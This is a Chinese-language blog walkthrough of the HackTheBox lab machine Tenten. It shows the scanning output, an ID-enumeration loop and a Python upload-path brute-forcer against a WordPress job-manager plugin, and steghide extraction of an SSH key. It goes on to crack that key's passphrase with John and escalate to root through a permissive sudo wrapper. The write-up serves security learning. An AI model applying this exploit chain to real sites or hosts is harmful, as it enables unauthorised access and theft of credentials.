2020-03-18 1.6k

HTB::Tenten Walkthrough

0x01 Information

0x02 Tools and Tis

nmap
wpscan
JohnTheRipper
steghide
wordpress job-manager plugin

0x03 Pentesting

nmap扫描靶机端口：

Nmap scan report for 10.10.10.10
Host is up (0.23s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal &#8211; Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.2 - 4.9 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 4.8 (92%), Linux 4.9 (91%), Linux 3.12 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   237.00 ms 10.10.16.1
2   309.00 ms 10.10.10.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 541.37 seconds

一看80端口运行wordpress站点，不多BB，直接上wpscan工具扫描：

wpscan使用教程：https://www.cnblogs.com/Xy--1/p/12236684.html

看到这个版本有很多XSS漏洞利用，但是打这个靶机XSS漏洞一般都是没什么作用，接着往下看，发现站点安装了一个job-manager的插件。

点击进入申请职位的页面，发现有一个文件上传的地方，先上传一个正常图片，再到http://10.10.10.10/wp-content/%year%/%month%/%filename%查看发现可以正常显示。再尝试用BurpSuite改一下文件内容：

服务端检测了后缀名，目前已知只能上传jpg，png等图片类型。

https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/

这篇文章提到了一种类似平行越权的手法：http://10.10.10.10/index.php/jobs/apply/8/，这里8类似招聘文章的id，我们可以使用BurpSuite遍历它：

另外，这里扩展一种思路，可以直接写bash脚本跑出来，这种结果更为直观：

1	for i in $(seq 1 20); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i \| grep '<title>'; done

id=13的这篇文章标题是HackerAccessGranted，比较可疑，另外id=17的文章标题是我刚刚上传的图片的文件名。这两点结合起来，我们怀疑HackerAccessGranted是不是也是用户上传的一张图片的文件名。但是要访问到这张图片，我们必须知道上传的年份和月份，想到这里，那就写一个Python脚本跑一下：

import requests

website = 'http://10.10.10.10/wp-content/uploads/'
filename = 'HackerAccessGranted'
exts = ['jpg', 'png', 'gif']

for year in range(2016, 2018):
    for month in range(1, 13):
        for ext in exts:
            url = website + str(year) + '/' + "{:02}".format(month) + '/' + filename + '.' + ext
            req = requests.get(url)
            if req.status_code == 404:
                url = website
            else:
                print('[+] URL Found: ' + url)

得到结果http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg

把图片用binwalk检查一下：

$ binwalk HackerAccessGranted.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01

再用隐写工具steghide提取一下：

1
2
3

$ steghide extract -sf HackerAccessGranted.jpg 
Enter passphrase: 
wrote extracted data to "id_rsa".

OK，提取出了id_rsa文件，再用John一把梭

$ python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash 
$ /sbin/john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword    (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:08 DONE (2020-03-18 10:52) 0.1173g/s 1683Kp/s 1683Kc/s 1683KC/sa6_123..*7¡Vamos!
Session completed

好了，得到了密码，但是现在好像还没有用户名orz…，再用wpscan枚举站点的用户名

[i] User(s) Identified:

[+] takis
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

再用ssh登录靶机，获取user.txt

$ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

65 packages can be updated.
39 updates are security updates.


Last login: Fri May  5 23:05:36 2017
[email protected]:~$ whoami
takis
[email protected]:~$ ls -la /home/takis
total 48
drwx------ 5 takis takis 4096 Apr 12  2017 .
drwxr-xr-x 5 root  root  4096 Apr 12  2017 ..
-rw------- 1 root  root     1 Dec 24  2017 .bash_history
-rw-r--r-- 1 takis takis  220 Apr 12  2017 .bash_logout
-rw-r--r-- 1 takis takis 3771 Apr 12  2017 .bashrc
drwx------ 2 takis takis 4096 Apr 12  2017 .cache
-rw------- 1 root  root   162 Apr 12  2017 .mysql_history
drwxrwxr-x 2 takis takis 4096 Apr 12  2017 .nano
-rw-r--r-- 1 takis takis  655 Apr 12  2017 .profile
drwx------ 2 takis takis 4096 Apr 12  2017 .ssh
-rw-r--r-- 1 takis takis    0 Apr 12  2017 .sudo_as_admin_successful
-r--r--r-- 1 takis takis   33 Apr 12  2017 user.txt
-rw-r--r-- 1 root  root   217 Apr 12  2017 .wget-hsts

提权就很简单了

[email protected]:~$ sudo -l
Matching Defaults entries for takis on tenten:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin
[email protected]:~$ ls -la /bin/fuckin
-rwxr-xr-x 1 root root 24 Apr 12  2017 /bin/fuckin
[email protected]:~$ cat /bin/fuckin
#!/bin/bash
$1 $2 $3 $4
[email protected]:~$ sudo /bin/fuckin cat /root/root.txt
f9f7[------------------]f603

0x04 Summary

Tenten算是一个比较古老的Linux靶机了，就权当开阔知识面，这个靶机的风格和CTF的比赛题很像，通过找wordpress站点的插件漏洞，以及常见的wordpress上传路径来找到隐写id_rsa文件的图片。之后的过程就是比较简单的提权操作了，方法有很多。这个靶机算是比较简单的吧，写了一个小脚本来爆破目录，一天搞定，明天继续。

靶机->HTB
#靶机

文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox-Retired

HackTheBox-Active

VulnHub

代码审计

PHP代码审计

大数据安全

机器学习

基础学习

Python

Python基础

Python安全

Java

Java基础

Java安全

算法

Leetcode

随笔

经验

技术

HTB::Tenten Walkthrough

0x01 Information

0x02 Tools and Tis

0x03 Pentesting

0x04 Summary